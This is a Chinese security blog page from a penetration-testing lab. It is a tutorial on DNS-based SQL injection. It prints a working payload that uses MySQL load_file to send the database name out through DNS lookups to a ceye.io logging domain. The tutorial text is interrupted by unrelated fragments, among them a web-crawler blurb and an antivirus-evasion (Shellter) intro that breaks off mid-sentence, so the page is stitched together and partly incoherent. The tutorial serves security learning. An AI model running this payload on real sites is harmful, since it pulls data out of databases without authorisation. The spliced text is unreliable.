Dns注入

释放双眼,带上耳机,听听看~!

【小组作业】Web Crawler

本文作者:小白虫(Ms08067实验室Python渗透小组成员) 前言 <这里用的scrapy框架,来编写爬虫,官方文档(https://docs.scrapy.org/en/latest/)> 具体功能实现:爬取网站所有链接,探测网页状态,并加随机延迟绕过防护。 1、代码流程 2、代码编写 2.1 item.py

本文作者:cong9184(Ms08067实验室核心成员)

为什么要使用DNS注入?

盲注跑数据太慢的情况下,可以选择DNS注入

DNS注入的原理?

域名DNS指向的是我们服务器的域名,意味着解析域名时需向DNS服务器查询。通过递归查询可以获取数据库上的信息。要记住整个域名内的节点标签被限制在63个字符长度大小。

使用条件:

1. 有sql注入点

2. 该站点的load_file可以使用

 

演示:

本地搭建phpstudy环境

然后注册一个ceye.io的账号,作为dns注入的平台

用到的东西呢就是下图中画圈的

这是一个域名:

分析一下:

Ceye.io 就不用说了,

前面的   xxxx.ceye.io是你的个人域名

Dns注入最后的效果呢就是在xxxx.ceye.io前面显示你注入的结果。例如:

你得到的数据库是test

那么效果则是:test.xxxx.ceye.io

好的,废话不多说,实例演示

使用到的语句呢就是下面这条:

and if((select load_file(concat(‘\\\\’,(select database()),’.eq6w9l.ceye.io\\abc’))),1,0)

 

分析一下:

And 就不多说了,连接前后语句嘛!

Shellter方式规避杀软

    在黑客进行攻击的的过程中通常都需要规避安全防护设备,例如:入侵检测(IDS)或者杀毒软件(AV)。当在使用一些他人或者其它工具生成的exploit或者payload,例如:metasploit或者exploit-DB,在进行入侵的过程中很有可能被一些安全防护设备所发现。此时如果

If(1,2,3)这个函数,里面是三个条件,如果1这个位置是true那么执行2位置语句,否则执行3位置语句。

我们都知道,load_file是可以读取文件的,那么,我们把这个文件换成可执行的语句呢?

再说一个小知识点,\\xxxxx.xxxxxx

如果说我们在下图位置写这个东西呢,就会执行这个后面的域名吧!

同理,你在load_file中写这个也是会执行的,所以就利用这个特点进行的dns注入。

‘\\\\’,(select database()),’.eq6w9l.ceye.io\\abc’

首先前面的\\\\实际上是两个\其中两个是作为转义符号来的,然后(select database())是真正的执行语句,然后后面拼接上你的域名,最后面加的\\abc,实例发现,后面不加\\abc或者\\其他字符是无法进行dns注入的,必须加上\\abc或者\\aaa等等都可以,但是记住一定要加。

Ok,payload已经写好了,就执行吧!

效果

那么究竟对不对呢?

我们联合注入看一下:

Dns注入呢到这里基本已经算是ok了!

其他的语句也同样一样!


来源:Ms08067安全实验室



界世的你当

作你的肩膀



 ms08067安全实验室

本文源自微信公众号:Ms08067安全实验室

《Web安全攻防》配套视频之 SQL注入原理

《Web安全攻防-渗透测试实战指南》配套视频 第九期 本期视频内容对应图书 第4章 Web安全原理剖析 4.1 SQL注入的基础 4.1.1 介绍SQL注入 4.1.2 SQL注入的原理 如果学习有疑问, 可以登录官网: https://www.ms08067.com 书籍介绍 《Web安全攻防-渗透测试实战指

人已赞赏
安全工具

《Web安全攻防》配套视频之 Nmap详解

2019-10-14 20:18:55

安全工具

【小组作业】Web Crawler

2019-10-14 20:19:01

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索